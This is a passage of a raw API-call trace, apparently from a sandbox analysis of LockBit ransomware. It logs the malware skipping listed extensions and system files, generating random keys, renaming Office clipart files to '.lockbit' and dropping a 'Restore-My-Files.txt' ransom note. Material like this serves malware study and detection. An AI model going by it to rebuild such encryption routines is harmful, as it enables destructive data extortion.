lpString2=".WMF") returned -1 [0161.815] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.815] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.815] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.815] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.816] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.817] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.817] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00394_.WMF") returned 1 [0161.817] lstrcmpiW (lpString1="ntldr", lpString2="NA00394_.WMF") returned 1 [0161.817] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00394_.WMF") returned 1 [0161.818] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00394_.WMF") returned -1 [0161.818] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00394_.WMF") returned -1 [0161.818] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00394_.WMF") returned 1 [0161.818] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00394_.WMF") returned -1 [0161.818] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.818] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00394_.WMF") returned=".WMF" [0161.818] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.818] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.818] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.819] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.819] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00394_.WMF.lockbit") returned 72 [0161.819] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00394_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00394_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.824] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.824] malloc (_Size=0x40068) returned 0x1ff1e60 [0161.824] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10964) returned 1 [0161.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0161.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.826] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0161.826] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0161.828] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00394_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00394_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.828] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.829] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.830] free (_Block=0x1fa2ed8) [0161.830] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00394_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.830] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.830] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.831] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c22fe00, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4c22fe00, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0x194a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00395_.WMF", cAlternateFileName="")) returned 1 [0161.831] lstrcmpiW (lpString1=".", lpString2="NA00395_.WMF") returned -1 [0161.831] lstrcmpiW (lpString1="..", lpString2="NA00395_.WMF") returned -1 [0161.831] PathFindExtensionW (pszPath="NA00395_.WMF") returned=".WMF" [0161.831] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.831] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.832] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.832] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.833] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.833] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.833] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.833] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.833] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.833] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.833] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.833] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.833] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.833] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.833] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00395_.WMF") returned 1 [0161.833] lstrcmpiW (lpString1="ntldr", lpString2="NA00395_.WMF") returned 1 [0161.833] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00395_.WMF") returned 1 [0161.833] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00395_.WMF") returned -1 [0161.833] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00395_.WMF") returned -1 [0161.833] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00395_.WMF") returned 1 [0161.833] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00395_.WMF") returned -1 [0161.833] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.833] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00395_.WMF") returned=".WMF" [0161.833] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.834] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.834] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.835] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.835] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.835] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.835] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.835] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.835] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.835] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00395_.WMF.lockbit") returned 72 [0161.835] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00395_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00395_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0161.836] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.836] malloc (_Size=0x40068) returned 0x3e70008 [0161.836] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=6474) returned 1 [0161.836] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0161.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0161.838] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0161.843] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00395_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00395_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.843] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.843] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.844] free (_Block=0x1fa2ed8) [0161.844] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00395_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.844] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.844] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.845] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4af1d100, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4af1d100, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0x38c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00396_.WMF", cAlternateFileName="")) returned 1 [0161.845] lstrcmpiW (lpString1=".", lpString2="NA00396_.WMF") returned -1 [0161.845] lstrcmpiW (lpString1="..", lpString2="NA00396_.WMF") returned -1 [0161.845] PathFindExtensionW (pszPath="NA00396_.WMF") returned=".WMF" [0161.845] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.845] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.846] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.846] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.847] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00396_.WMF") returned 1 [0161.847] lstrcmpiW (lpString1="ntldr", lpString2="NA00396_.WMF") returned 1 [0161.847] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00396_.WMF") returned 1 [0161.847] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00396_.WMF") returned -1 [0161.847] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00396_.WMF") returned -1 [0161.847] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00396_.WMF") returned 1 [0161.847] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00396_.WMF") returned -1 [0161.848] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.848] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00396_.WMF") returned=".WMF" [0161.848] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.848] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.848] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.849] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.849] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.849] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.849] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.849] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.849] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.849] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.849] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.849] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.849] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.849] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.849] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program 